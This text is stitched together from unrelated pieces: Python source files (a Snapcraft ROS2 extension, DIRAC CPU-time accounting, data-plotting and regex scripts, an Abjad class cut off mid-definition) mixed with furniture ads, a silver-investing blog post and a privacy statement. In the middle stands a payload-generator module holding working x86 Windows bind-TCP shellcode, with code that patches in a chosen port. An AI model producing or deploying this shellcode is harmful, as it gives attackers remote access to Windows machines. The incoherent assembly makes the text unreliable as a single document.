@staticmethod
def get_supported_confinement() -> Tuple[str, ...]:
return ("strict", "devmode")
@staticmethod
def is_experimental(base: Optional[str]) -> bool:
return True
def __init__(self, *, extension_name: str, yaml_data: Dict[str, Any]) -> None:
super().__init__(extension_name=extension_name, yaml_data=yaml_data)
python_paths = [
f"$SNAP/opt/ros/{self.ROS_DISTRO}/lib/python3.8/site-packages",
"$SNAP/usr/lib/python3/dist-packages",
"${PYTHONPATH}",
]
self.root_snippet = {
"package-repositories": [
{
"type": "apt",
"url": "http://repo.ros2.org/ubuntu/main",
"components": ["main"],
"formats": ["deb"],
"key-id": "C1CF6E31E6BADE8868B172B4F42ED6FBAB17C654",
"key-server": "keyserver.ubuntu.com",
"suites": ["focal"],
}
]
}
self.app_snippet = {
"command-chain": ["snap/command-chain/ros2-launch"],
"environment": {
"ROS_DISTRO": self.ROS_DISTRO,
"PYTHONPATH": ":".join(python_paths),
},
}
self.part_snippet = {"build-environment": [{"ROS_DISTRO": self.ROS_DISTRO}]}
self.parts = {
f"ros2-{self.ROS_DISTRO}-extension": {
"source": "$SNAPCRAFT_EXTENSIONS_DIR/ros2",
"plugin": "nil",
"override-build": "install -D -m 0755 launch ${SNAPCRAFT_PART_INSTALL}/snap/command-chain/ros2-launch",
"build-packages": [f"ros-{self.ROS_DISTRO}-ros-core"],
}
}
|
The Post & Rail Nightstand with one drawer and one shelf is ideal for your bedroom or in your living room as a side table. Constructed of solid pine in a vintage espresso finish this nightstand is accented by grain details, highlighting its expert craftsmanship.
I hope for the price I paid these 2 same items, my contribution helped in saving some trees... a fair amount of trees...!
All good for the rest, thanks Jordan's! |
""" The TimeLeft utility allows to calculate the amount of CPU time
left for a given batch system slot. This is essential for the 'Filling
Mode' where several VO jobs may be executed in the same allocated slot.
The prerequisites for the utility to run are:
- Plugin for extracting information from local batch system
- Scale factor for the local site.
With this information the utility can calculate in normalized units the
CPU time remaining for a given slot.
"""
import os
import DIRAC
from DIRAC import gLogger, gConfig, S_OK, S_ERROR
from DIRAC.Core.Utilities.Subprocess import shellCall
__RCSID__ = "$Id$"
class TimeLeft( object ):
""" This generally does not run alone
"""
#############################################################################
def __init__( self ):
""" Standard constructor
"""
self.log = gLogger.getSubLogger( 'TimeLeft' )
# This is the ratio SpecInt published by the site over 250 (the reference used for Matching)
self.scaleFactor = gConfig.getValue( '/LocalSite/CPUScalingFactor', 0.0 )
if not self.scaleFactor:
self.log.warn( '/LocalSite/CPUScalingFactor not defined for site %s' % DIRAC.siteName() )
self.normFactor = gConfig.getValue( '/LocalSite/CPUNormalizationFactor', 0.0 )
if not self.normFactor:
self.log.warn( '/LocalSite/CPUNormalizationFactor not defined for site %s' % DIRAC.siteName() )
# CPU and wall clock margins, which don't seem to be set anywhere
self.cpuMargin = gConfig.getValue('/LocalSite/CPUMargin', 2) # percent
self.wallClockMargin = gConfig.getValue('/LocalSite/wallClockMargin', 8) # percent
result = self.__getBatchSystemPlugin()
if result['OK']:
self.batchPlugin = result['Value']
else:
self.batchPlugin = None
self.batchError = result['Message']
def getScaledCPU( self, processors = 1 ):
"""Returns the current CPU Time spend (according to batch system) scaled according
to /LocalSite/CPUScalingFactor
"""
# Quit if no scale factor available
if not self.scaleFactor:
return 0
# Quit if Plugin is not available
if not self.batchPlugin:
return 0
resourceDict = self.batchPlugin.getResourceUsage()
if 'Value' in resourceDict:
if resourceDict['Value']['CPU']:
return resourceDict['Value']['CPU'] * self.scaleFactor
elif resourceDict['Value']['WallClock']:
# When CPU value missing, guess from WallClock and number of processors
return resourceDict['Value']['WallClock'] * self.scaleFactor * processors
return 0
#############################################################################
def getTimeLeft( self, cpuConsumed = 0.0, processors = 1 ):
"""Returns the CPU Time Left for supported batch systems. The CPUConsumed
is the current raw total CPU.
"""
# Quit if no scale factor available
if not self.scaleFactor:
return S_ERROR( '/LocalSite/CPUScalingFactor not defined for site %s' % DIRAC.siteName() )
if not self.batchPlugin:
return S_ERROR( self.batchError )
resourceDict = self.batchPlugin.getResourceUsage()
if not resourceDict['OK']:
self.log.warn( 'Could not determine timeleft for batch system at site %s' % DIRAC.siteName() )
return resourceDict
resources = resourceDict['Value']
self.log.debug( "self.batchPlugin.getResourceUsage(): %s" % str( resources ) )
if not resources['CPULimit'] and not resources['WallClockLimit']:
# This should never happen
return S_ERROR( 'No CPU or WallClock limit obtained' )
# if one of CPULimit or WallClockLimit is missing, compute a reasonable value
if not resources['CPULimit']:
resources['CPULimit'] = resources['WallClockLimit'] * processors
elif not resources['WallClockLimit']:
resources['WallClockLimit'] = resources['CPULimit']
# if one of CPU or WallClock is missing, compute a reasonable value
if not resources['CPU']:
resources['CPU'] = resources['WallClock'] * processors
elif not resources['WallClock']:
resources['WallClock'] = resources['CPU']
timeLeft = 0.
cpu = float( resources['CPU'] )
cpuLimit = float( resources['CPULimit'] )
wallClock = float( resources['WallClock'] )
wallClockLimit = float( resources['WallClockLimit'] )
validTimeLeft = enoughTimeLeft(cpu, cpuLimit, wallClock, wallClockLimit, self.cpuMargin, self.wallClockMargin)
if validTimeLeft:
if cpu and cpuConsumed > 3600. and self.normFactor:
# If there has been more than 1 hour of consumed CPU and
# there is a Normalization set for the current CPU
# use that value to renormalize the values returned by the batch system
# NOTE: cpuConsumed is non-zero for call by the JobAgent and 0 for call by the watchdog
# cpuLimit and cpu may be in the units of the batch system, not real seconds... (in this case the other case won't work)
# therefore renormalise it using cpuConsumed (which is in real seconds)
timeLeft = ( cpuLimit - cpu ) * self.normFactor * cpuConsumed / cpu
elif self.normFactor:
# FIXME: this is always used by the watchdog... Also used by the JobAgent
# if consumed less than 1 hour of CPU
# It was using self.scaleFactor but this is inconsistent: use the same as above
# In case the returned cpu and cpuLimit are not in real seconds, this is however rubbish
timeLeft = ( cpuLimit - cpu ) * self.normFactor
else:
# Last resort recovery...
timeLeft = ( cpuLimit - cpu ) * self.scaleFactor
self.log.verbose( 'Remaining CPU in normalized units is: %.02f' % timeLeft )
return S_OK( timeLeft )
else:
return S_ERROR( 'No time left for slot' )
#############################################################################
def __getBatchSystemPlugin( self ):
""" Using the name of the batch system plugin, will return an instance of the plugin class.
"""
batchSystems = {'LSF':'LSB_JOBID', 'PBS':'PBS_JOBID', 'BQS':'QSUB_REQNAME', 'SGE':'SGE_TASK_ID'} # more to be added later
name = None
for batchSystem, envVar in batchSystems.items():
if envVar in os.environ:
name = batchSystem
break
if name is None and 'MACHINEFEATURES' in os.environ and 'JOBFEATURES' in os.environ:
# Only use MJF if legacy batch system information not available for now
name = 'MJF'
if name is None:
self.log.warn( 'Batch system type for site %s is not currently supported' % DIRAC.siteName() )
return S_ERROR( 'Current batch system is not supported' )
self.log.debug( 'Creating plugin for %s batch system' % ( name ) )
try:
batchSystemName = "%sTimeLeft" % ( name )
batchPlugin = __import__( 'DIRAC.Core.Utilities.TimeLeft.%s' % #pylint: disable=unused-variable
batchSystemName, globals(), locals(), [batchSystemName] )
except ImportError as x:
msg = 'Could not import DIRAC.Core.Utilities.TimeLeft.%s' % ( batchSystemName )
self.log.warn( x )
self.log.warn( msg )
return S_ERROR( msg )
try:
batchStr = 'batchPlugin.%s()' % ( batchSystemName )
batchInstance = eval( batchStr )
except Exception as x: #pylint: disable=broad-except
msg = 'Could not instantiate %s()' % ( batchSystemName )
self.log.warn( x )
self.log.warn( msg )
return S_ERROR( msg )
return S_OK( batchInstance )
#############################################################################
def runCommand( cmd, timeout = 120 ):
"""Wrapper around shellCall to return S_OK(stdout) or S_ERROR(message)
"""
result = shellCall( timeout, cmd )
if not result['OK']:
return result
status, stdout, stderr = result['Value'][0:3]
if status:
gLogger.warn( 'Status %s while executing %s' % ( status, cmd ) )
gLogger.warn( stderr )
if stdout:
return S_ERROR( stdout )
if stderr:
return S_ERROR( stderr )
return S_ERROR( 'Status %s while executing %s' % ( status, cmd ) )
else:
return S_OK( str( stdout ) )
def enoughTimeLeft(cpu, cpuLimit, wallClock, wallClockLimit, cpuMargin, wallClockMargin):
""" Is there enough time?
:returns: True/False
"""
cpuRemainingFraction = 100 * (1. - cpu / cpuLimit)
wallClockRemainingFraction = 100 * (1. - wallClock / wallClockLimit)
fractionTuple = ( cpuRemainingFraction, wallClockRemainingFraction, cpuMargin, wallClockMargin )
gLogger.verbose( 'Used CPU is %.1f s out of %.1f, Used WallClock is %.1f s out of %.1f.' % ( cpu,
cpuLimit,
wallClock,
wallClockLimit ) )
gLogger.verbose( 'Remaining CPU %.02f%%, Remaining WallClock %.02f%%, margin CPU %s%%, margin WC %s%%' % fractionTuple )
if cpuRemainingFraction > cpuMargin \
and wallClockRemainingFraction > wallClockMargin:
gLogger.verbose( 'Remaining CPU %.02f%% < Remaining WallClock %.02f%% and margins respected (%s%% and %s%%)' % fractionTuple )
return True
else:
gLogger.verbose( 'Remaining CPU %.02f%% or WallClock %.02f%% fractions < margin (%s%% and %s%%) so no time left' % fractionTuple )
return False
# EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#
|
SilverDoctors: Which is the Better Silver Investment? Silver Eagles or 90% Face Coins?
As today seems to be a lazy Saturday afternoon with not much new to report, we thought we would bring readers' attention to an old piece written by Ted Butler's mentor, Izzy Friedman, and open it up to discussion.
Izzy wrote a piece several years ago advocating US Silver Eagles as the best form of silver to invest in.
While USSE's carry the highest premium over spot, Friedman looks for the US Mint to one day soon stop producing eagles entirely, which he believes will cause USSE premiums to skyrocket.
Personally, The Doc thinks that Izzy is correct, yet all of Mr. Friedman's arguments also apply to 90% silver US face coins (Pre-1964 coins)- and some of these very arguments are the reason why The Doc believes 90% US face coins to be the best form of silver to purchase today.
*90% face coins have one of if not THE lowest premiums of any investment form of silver available today, meaning you can exchange your fiat dollars for more ounces of silver in 90% form than you can for silver rounds, bars, Eagles, etc.
*90% face coins have ALREADY been discontinued from production, meaning that the same potential production stoppage of USSE's has ALREADY happened with 90% face US coins!
*90% face coins were also produced by the US Mint, meaning that investors can trust the silver content of the coins at 90% just as much as they trust that the silver content of a silver eagle is .999.
*90% face coins are FRACTIONAL silver pieces, which The Doc believes will result in higher premiums vs. 1oz denominations when the silver shortage arrives and silver reaches valuations near Friedman's levels.
I will include Mr. Friedman's thoughts below.
We are interested in our readers' thoughts and perspective on this issue as well.
What do you believe to be the best form of silver to invest in? |
"""
Bind TCP Payload
Completely ported from Metasploit Framework:
https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/stagers/windows/bind_tcp.rb
"""
import codecs
from lib.common import helpers
class ShellcodeModule:
def __init__(self, cli_arguments):
self.name = "Bind TCP Stager (Stage 1)"
self.description = "Binds to a user provided port and listens for an incoming connection"
self.cli_name = "bind_tcp"
self.platform = "Windows"
self.arch = "x86"
self.port_offset = 197
self.customized_shellcode = ""
self.stager = (
b"\xFC\xE8\x86\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
b"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
b"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
b"\x8B\x52\x10\x8B\x42\x3C\x8B\x4C\x10\x78\xE3\x4A\x01\xD1\x51\x8B" +
b"\x59\x20\x01\xD3\x8B\x49\x18\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31" +
b"\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8" +
b"\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B" +
b"\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61" +
b"\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x89\x5D\x68\x33\x32" +
b"\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8" +
b"\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50" +
b"\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x31" +
b"\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57\x68\xC2\xDB" +
b"\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF\xD5\x53\x53\x57" +
b"\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x97\x68\x75\x6E\x4D\x61\xFF\xD5" +
b"\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A" +
b"\x40\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5" +
b"\x93\x53\x6A\x00\x56\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3" +
b"\x29\xC6\x85\xF6\x75\xEC\xC3")
self.required_options = {
"LPORT": ["", "LPORT value"],
"Encoder": ["None", "Optional: Encoder to use when avoiding bad characters"],
"BadChars": ["\\x00", "Optional: Bad characters to avoid"],
"RHOST": ["", "RHOST value"]
}
def cli_gen_shellcode(self):
'''Invokes payload generating function since nothing special is needed
for cli specifically'''
self.payload_gen()
return
def gen_shellcode(self):
'''Invoked by main menu, generates code'''
self.payload_gen()
return
def payload_gen(self):
port_shellcode_stage = str(hex(int(self.required_options['LPORT'][0])).lstrip('0'))
if len(port_shellcode_stage.lstrip('x')) == 3:
# detect if odd number, is so, need to add a '0' to the front
port_1half = '0' + port_shellcode_stage[0:2].lstrip('x')
port_1half = '\\x' + port_1half
port_2half = port_shellcode_stage[2:4]
port_2half = '\\x' + port_2half
port_shellcode = port_1half + port_2half
elif len(port_shellcode_stage.lstrip('x')) == 4:
port_1half = port_shellcode_stage[1:3]
port_1half = '\\x' + port_1half
port_2half = port_shellcode_stage[3:5]
port_2half = '\\x' + port_2half
port_shellcode = port_1half + port_2half
elif len(port_shellcode_stage.lstrip('x')) == 2:
port_1half = port_shellcode_stage[1:3].lstrip('x')
port_1half = '\\x' + port_1half
port_2half = '00'
port_2half = '\\x' + port_2half
port_shellcode = port_2half + port_1half
elif len(port_shellcode_stage.lstrip('x')) == 1:
port_1half = port_shellcode_stage.lstrip('x')
port_1half = '\\x0' + port_1half
port_2half = '\\x00'
port_shellcode = port_2half + port_1half
stager_shellcode = codecs.encode(self.stager[0:self.port_offset], 'hex')
stager_shellcode = "\\x" + '\\x'.join(codecs.decode(stager_shellcode[i:i + 2], 'utf-8') for i in range(0, len(stager_shellcode), 2))
stager_shellcode += port_shellcode
part_2 = codecs.encode(self.stager[self.port_offset + 2:], 'hex')
part_2 = "\\x" + '\\x'.join(codecs.decode(part_2[i:i + 2], 'utf-8') for i in range(0, len(part_2), 2))
stager_shellcode += part_2
self.customized_shellcode = stager_shellcode
return
def print_shellcode(self):
print(self.customized_shellcode)
return
def payload_stats(self):
print(" [*] Payload Name: " + helpers.color(self.name))
print(" [*] Port: " + helpers.color(str(self.required_options['LPORT'][0])))
print(" [*] Shellcode Size: " + helpers.color(str(len(self.customized_shellcode) / 4).rstrip('.0') + '\n'))
print(self.customized_shellcode)
return
|
Thank you for your interest in Capital Financial Advisors !
©2016 CAPITAL Financial Advisors. All rights reserved. |
import csv, sys
forwards = {}
# Load legacy forwards
def load_forwards(filename):
infile = open(filename, 'r')
load_forwards_from_stream(infile)
infile.close()
def load_forwards_from_stream(infile):
reader = csv.reader(infile, delimiter='\t')
idcolumn = 0
repcolumn = 1
for row in reader:
if row[idcolumn].isdigit():
forwards[row[idcolumn]] = row[repcolumn]
else:
idcolumn = row.index('id')
repcolumn = row.index('replacement')
# load_forwards(sys.argv[1])
# load_forwards(sys.argv[2])
# want binary mode for output...
def dump_forwards_to_stream(outfile):
writer = csv.writer(outfile, delimiter='\t')
writer.writerow(('id', 'replacement'))
for id in forwards:
target = forwards[id]
i = 0
while target in forwards:
i += 1
if i > 100:
print '** probably cycle', id
break
target = forwards[target]
writer.writerow((id, target))
load_forwards_from_stream(sys.stdin)
outfile = open(sys.argv[1], 'wb')
dump_forwards_to_stream(outfile)
outfile.close()
|
eXcelleRes, based in Amsterdam, is responsible for the processing of personal data as shown in this privacy statement.
eXcelleRes processes your personal data by using our services and / or by providing it to us yourself.
Our website and / or service does not intend to collect data about website visitors who are younger than 16 years. Unless they have permission from parents or guardians. However, we can not check if a visitor is older than 16. We encourage parents to be involved in the online activities of their children, in order to prevent data about children being collected without parental consent. If you are convinced that we have collected personal information about a minor without this consent, please contact us at [email protected] and we will delete this information.
– eXcelleRes analyzes your behavior on the website in order to improve the website and to tailor the range of products and services to your preferences.
– eXcelleRes tracks your surfing behavior across various websites with which we tailor our products and services to your needs.
– eXcelleRes also processes personal data if we are legally obliged to do so, such as data that we need for our tax return.
eXcelleRes does not store your personal data for longer than is strictly necessary to realize the purposes for which your data is collected. We use a standard retention period of 5 years for all data (including all personal data).
eXcelleRes provides exclusively to third parties and only if this is necessary for the execution of our agreement with you or to comply with a legal obligation.
You have the right to view, correct or delete your personal data. You also have the right to withdraw your consent to the data processing or to object to the processing of your personal data by eXcelleRes and you have the right to data portability. This means that you can submit a request to us to send the personal information we have in your computer file to you or another organization mentioned by you.
You can send a request for access, correction, deletion, data transfer of your personal data or request for cancellation of your consent or objection to the processing of your personal data to [email protected]. |
#!/usr/bin/python
# -*- coding: utf-8 -*-
""" plot_sensors.py <filename> <node_id> ...
plot sensors values from <node_id> printed by smart_tiles firmware
saved in filename (by serial_aggregator)
Example of use :
After firmware deployement on m3-29 to m3-32
mypc> aggr.sh 29 30 31 32 > data.txt
mypc> python myplot.py data.txt 29 30 31 32
"""
import sys
import os
import numpy as np
import matplotlib.pyplot as plt
FIELDS = {'time': 0, 'name': 1, 'type': 2, 'X': 3, 'Y': 4, 'Z': 5}
def imu_load(filename):
""" Load iot-lab imu file
Parameters:
------------
filename: string
imu filename saved from smart_tiles firmware
Returns:
-------
data : numpy array
[timestamp node_name sensor_type X Y Z]
"""
try:
mytype = [('time', '<f8'), ('name', '|S11'), ('type', '|S11'),
('X', '<f8'), ('Y', '<f8'), ('Z', '<f8')]
# pylint:disable=I0011,E1101
data = np.genfromtxt(filename, skip_header=1, invalid_raise=False,
delimiter=";", dtype=mytype)
except IOError as err:
sys.stderr.write("Error opening oml file:\n{0}\n".format(err))
sys.exit(2)
except (ValueError, StopIteration) as err:
sys.stderr.write("Error reading oml file:\n{0}\n".format(err))
sys.exit(3)
# Start time to 0 sec
data['time'] = data['time'] - data['time'][0]
return data
def imu_extract(data, node_name='', sensor_type='Acc'):
""" Extract iot-lab imu data for node_name, sensor_type
Parameters:
------------
data: numpy array
[time name type X Y Z]
node_name: string
name of the iot-lab name to be extracted
sensor_type: string
type of the sensor to be extracted 'Acc' or 'Mag'
"""
if node_name != '':
condition = data['name'] == node_name
# pylint:disable=I0011,E1101
filtname_data = np.extract(condition, data)
else:
filtname_data = data
condition = filtname_data['type'] == sensor_type
# pylint:disable=I0011,E1101
filt_data = np.extract(condition, filtname_data)
return filt_data
def imu_plot(data, title):
""" Plot iot-lab imu data
Parameters:
------------
data: numpy array
[time name type X Y Z]
title: string
title of the plot
"""
plt.figure()
plt.grid()
plt.title(title)
plt.plot(data['time'], data['X'])
plt.plot(data['time'], data['Y'])
plt.plot(data['time'], data['Z'])
plt.xlabel('Sample Time (sec)')
return
def imu_all_plot(data, title, ylabel, nodes, sensor_type):
""" Plot iot-lab imu data
Parameters:
------------
data: numpy array
[time name type X Y Z]
title: string
title of the plot
ylabel: stringx
ylabel of the plot
nodes: tab of string
list of nodes_names
"""
nbplots = len(nodes)
if nbplots > 0:
plt.figure()
i = 0
for node in nodes:
i = i + 1
node_plot = plt.subplot(nbplots, 1, i)
node_plot.grid()
plt.title(title + nodes[i-1])
datanode = imu_extract(data, nodes[i-1], sensor_type)
peaknode = imu_extract(data, nodes[i-1], sensor_type+'Peak')
print nodes[i-1], len(datanode)
norm = np.sqrt(datanode['X']**2 + datanode['Y']**2
+ datanode['Z']**2)
node_plot.plot(datanode['time'], norm)
node_plot.plot(peaknode['time'], peaknode['X'], 'ro')
plt.ylabel(ylabel)
plt.xlabel('Sample Time (sec)')
return
def usage():
"""Usage command print
"""
print "Usage"
print __doc__
if __name__ == "__main__":
if len(sys.argv) <= 2:
usage()
else:
filename = sys.argv[1]
# Verif the file existence
if not os.path.isfile(filename):
usage()
sys.exit(1)
# Nodes list
nodes =[]
for arg in sys.argv[2:]:
nodes.append('m3-'+arg)
# extract data from file
data = imu_load(filename)
# Plot all sensors acc sensors
for node in nodes:
#datanode = imu_extract(data, node, sensor_type='Acc')
#imu_plot(datanode, "Accelerometers " + node)
datanode = imu_extract(data, node, sensor_type='Mag')
imu_plot(datanode, "Magnetometers " + node)
# Plot all norm accelerometers on a same windows
#imu_all_plot(data, "Accelerometers ", "Norm Acceleration (G)", nodes, 'Acc')
imu_all_plot(data, "Magnetometers ", "Norm ", nodes, 'Mag')
plt.show()
|
Our delta table base is yet another new offering that we think you will be thrilled about. With its unique solid, stylish and modern profile in polished Stainless steel, it is designed for the most discriminating tastes.
Minimal but elegant, the Delta Noveau adds a touch of class to any workplace.
A modern twist on the classic executive desk.
This executive desk offers a modern twist on a great classic line. It is a sophisticated alternative for the executive office with both timeless form and superb function. It comprises combined desk and return, feature tile lines on return undercarriage. The desktop appears to float on one side and it balances on a subframe above the return’s top with sturdy panel leg on the other end. This desk creates a distinctive vibe for the executive or manager who wants something aesthetically pleasing yet practical for their office.
Keeping abreast with developments in office design, Flux Executive offers a clean and minimal aesthetic to any workspace. Clean lines and balanced proportions along with 100mm height adjustment.
The clean and minimal design is what makes the Geo Executive Plaza a staple in any workplace.
The clean and minimal design is what makes the Geo Executive Vista a staple in any workplace.
The clean and minimal design is what makes the Geo Executive Verse a staple in any workplace.
It features a heavy-duty motor drive, as a standard for both strength & durability. Comes in 35 different finishes. |
__author__ = 'Piotr Moczurad and Michal Ciolczyk'
import os
import sys
import re
import codecs
re_flags = re.MULTILINE | re.U
author_pattern = re.compile(r'<META NAME="AUTOR" CONTENT="(.+)">', re_flags)
dept_pattern = re.compile(r'<META NAME="DZIAL" CONTENT="(.+)">', re_flags)
key_pattern = re.compile(r'<META NAME="KLUCZOWE_?\d*" CONTENT="(.+)">', re_flags)
text_pattern = re.compile(r'<P>(.+)<META NAME="AUTOR"', re_flags | re.DOTALL)
phrase_pattern = re.compile(r'([\w \-+*:,;\.]+)([\.?!]+|$)', re_flags)
abbrev_pattern = re.compile(r'\s\w{1,4}\.', re_flags)
#lepiej widac na debuggex.com
num_pattern = re.compile(
r'-32768|[-\s](3276[0-7]|327[0-5]\d|327[0-5]\d{2}|32[0-6]\d{3}|3[0-1]\d{4}|[1-2]?\d{1,4})(([.,;:]\s)|\s)', re_flags)
float_pattern = re.compile(r'(-?(\d+\.\d*|\.\d+)(?:(e|E)\-?\d+)?)[.,;:]?\s', re_flags)
#ponizsze regexy czytelne tylko na debuggexie
dates_pattern = re.compile(
r'(?P<yearA>\d{4})(?P<separatorA>[-\./])((?P<monthA1>0[13578]|1[02])'
r'(?P=separatorA)(?P<dayA1>[0-2]\d|3[0-1])|((?P<monthA2>0[469]|11)'
r'(?P=separatorA)(?P<dayA2>[0-2]\d|30))|((?P<monthA3>02)(?P=separatorA)'
r'(?P<dayA3>[0-1]\d|2[0-9])))|((?P<dayB1>[0-2]\d|3[0-1])'
r'(?P<separatorB1>[-\./])(?P<monthB1>0[13578]|1[02])|(?P<dayB2>[0-2]\d|30)'
r'(?P<separatorB2>[-\./])(?P<monthB2>0[469]|11)|(?P<dayB3>[0-1]\d|2[0-9])'
r'(?P<separatorB3>[-\./])(?P<monthB3>02))((?P=separatorB1)|(?P=separatorB2)|(?P=separatorB3))'
r'(?P<yearB>\d{4})',
re_flags) # TODO: Fix accepting 00 as day
emails_pattern = re.compile(
r'([A-Za-z0-9+\-]([A-Za-z0-9+\-]|[A-Za-z0-9+\-\.][A-Za-z0-9+\-])+'
r'@[A-Za-z0-9]([A-Za-z\.0-9][A-Za-z0-9]|[A-Za-z0-9])*\.[A-Za-z0-9]{2,4})',
re_flags)
# uwzglednione zostalo takze to, ze adres e-mail musi konczyc sie TLD
def my_match(pattern, content):
match = pattern.search(content)
if match:
return match.groups()[0]
else:
return ""
def multi_match(pattern, content):
matches = re.findall(pattern, content)
return ", ".join(matches)
def count_matches(pattern, content):
match = pattern.findall(content)
if match:
return len(match)
else:
return 0
def count_different_matches(pattern, content):
match = pattern.findall(content)
if match:
s = set()
for x in match:
s.add(x)
return len(s)
else:
return 0
def count_different_dates(content):
matches = dates_pattern.finditer(content)
if matches:
s = set()
for match in matches:
day = ""
month = ""
year = ""
groups = match.groupdict()
for g in groups:
v = groups[g]
if g[0:3] == "day" and v is not None:
day = v
elif g[0:5] == "month" and v is not None:
month = v
elif g[0:4] == "year" and v is not None:
year = v
s.add(year + "-" + month + "-" + day)
return len(s)
else:
return 0
def count_ints(content):
ints = map(lambda m: m[0] if isinstance(m, tuple) else m,
num_pattern.findall(content))
return len(set(ints))
def process_file(file_path):
fp = codecs.open(file_path, 'rU', 'iso-8859-2')
content = fp.read()
#
# INSERT YOUR CODE HERE
#
fp.close()
print("nazwa pliku: " + file_path)
print("autor: " + my_match(author_pattern, content))
print("dzial: " + my_match(dept_pattern, content))
print("slowa kluczowe: " + multi_match(key_pattern, content))
text = my_match(text_pattern, content)
print("liczba zdan: " + str(count_matches(phrase_pattern, text)))
print("liczba skrotow: " + str(count_different_matches(abbrev_pattern, text)))
print("liczba liczb calkowitych z zakresu int: " + str(count_ints(text)))
print("liczba liczb zmiennoprzecinkowych: " + str(count_different_matches(float_pattern, text)))
print("liczba dat: " + str(count_different_dates(text)))
print("liczba adresow email: " + str(count_different_matches(emails_pattern, text)))
print("\n")
try:
path = sys.argv[1]
except IndexError:
print("Brak podanej nazwy katalogu")
sys.exit(0)
tree = os.walk(path)
for root, dirs, files in tree:
for f in files:
if f.endswith(".html"):
filepath = os.path.join(root, f)
process_file(filepath) |
All products from Hampshire Office Furniture are delivered and installed by our team of professional installers. Their job is to ensure you are 100% satisfied with your new office furniture.
Based in Havant, Hampshire and with over 40 years’ experience in the industry, we can offer an extensive range of high quality office furniture to suit all tastes, budgets and personalities.
Whether you’re looking for a traditional office set-up or creating a modern agile working environment, we will have a solution for you.
To provide a 5-star service to all our customers.
We have an excellent range of chairs for the workplace to suit any style and budget including Meeting Room Chairs, Executive Chairs, Soft Seating, Task Chairs and much, much, MUCH more!
We offer a full range of office desk solutions to suit any working environment. All of our desking ranges come in an extensive range of finishes, along with integral cable management to help keep your workplace organised. Coupled with essential office storage items such as desk pedestals, our office desks will make your office look and feel great to work in.
The design of your reception area will speak volumes about your business. This is where your visitors form their first perception of you and start making decisions about your company. For this reason, we have created an extensive range of reception area furniture to ensure all your customers are impressed from the minute they walk through your door.
We're always happy to help so if you have any questions, please don't hesitate to get in contact with the team here at Hampshire Office Furniture either by phone or email.
Motivated well performing staff are your company’s greatest asset.
Basic space planning principles and methods for commercial offices. |
# -*- encoding: utf-8 -*-
from abjad.tools import stringtools
from abjad.tools.abctools import AbjadValueObject
class Scheme(AbjadValueObject):
r'''Abjad model of Scheme code.
.. container:: example
**Example 1.** A Scheme boolean value:
::
>>> scheme = schemetools.Scheme(True)
>>> print(format(scheme))
##t
.. container:: example
**Example 2.** A nested Scheme expession:
::
>>> scheme = schemetools.Scheme(
... ('left', (1, 2, False)),
... ('right', (1, 2, 3.3))
... )
>>> print(format(scheme))
#((left (1 2 #f)) (right (1 2 3.3)))
.. container:: example
**Example 3.** A variable-length argument:
::
>>> scheme_1 = schemetools.Scheme(1, 2, 3)
>>> scheme_2 = schemetools.Scheme((1, 2, 3))
>>> format(scheme_1) == format(scheme_2)
True
Scheme wraps nested variable-length arguments in a tuple.
.. container:: example
**Example 4.** A quoted Scheme expression:
::
>>> scheme = schemetools.Scheme((1, 2, 3), quoting="'#")
>>> print(format(scheme))
#'#(1 2 3)
Use the `quoting` keyword to prepend Scheme's various quote, unquote,
unquote-splicing characters to formatted output.
.. container:: example
**Example 5.** A Scheme expression with forced quotes:
::
>>> scheme = schemetools.Scheme('nospaces', force_quotes=True)
>>> print(format(scheme))
#"nospaces"
Use this in certain \override situations when LilyPond's Scheme
interpreter treats unquoted strings as symbols instead of strings.
The string must contain no whitespace for this to work.
.. container:: example
**Example 6.** A Scheme expression of LilyPond functions:
::
>>> function_1 = 'tuplet-number::append-note-wrapper'
>>> function_2 = 'tuplet-number::calc-denominator-text'
>>> string = schemetools.Scheme('4', force_quotes=True)
>>> scheme = schemetools.Scheme(
... function_1,
... function_2,
... string,
... )
>>> scheme
Scheme('tuplet-number::append-note-wrapper', 'tuplet-number::calc-denominator-text', Scheme('4', force_quotes=True))
>>> print(format(scheme))
#(tuplet-number::append-note-wrapper tuplet-number::calc-denominator-text "4")
.. container:: example
**Example 7.** A Scheme lambda expression of LilyPond function that
takes a markup with a quoted string argument. Setting verbatim to true
causes the expression to format exactly as-is without modifying quotes
or whitespace:
::
>>> string = '(lambda (grob) (grob-interpret-markup grob'
>>> string += r' #{ \markup \musicglyph #"noteheads.s0harmonic" #}))'
>>> scheme = schemetools.Scheme(string, verbatim=True)
>>> scheme
Scheme('(lambda (grob) (grob-interpret-markup grob #{ \\markup \\musicglyph #"noteheads.s0harmonic" #}))')
>>> print(format(scheme))
#(lambda (grob) (grob-interpret-markup grob #{ \markup \musicglyph #"noteheads.s0harmonic" #}))
Scheme objects are immutable.
'''
### CLASS VARIABLES ###
__slots__ = (
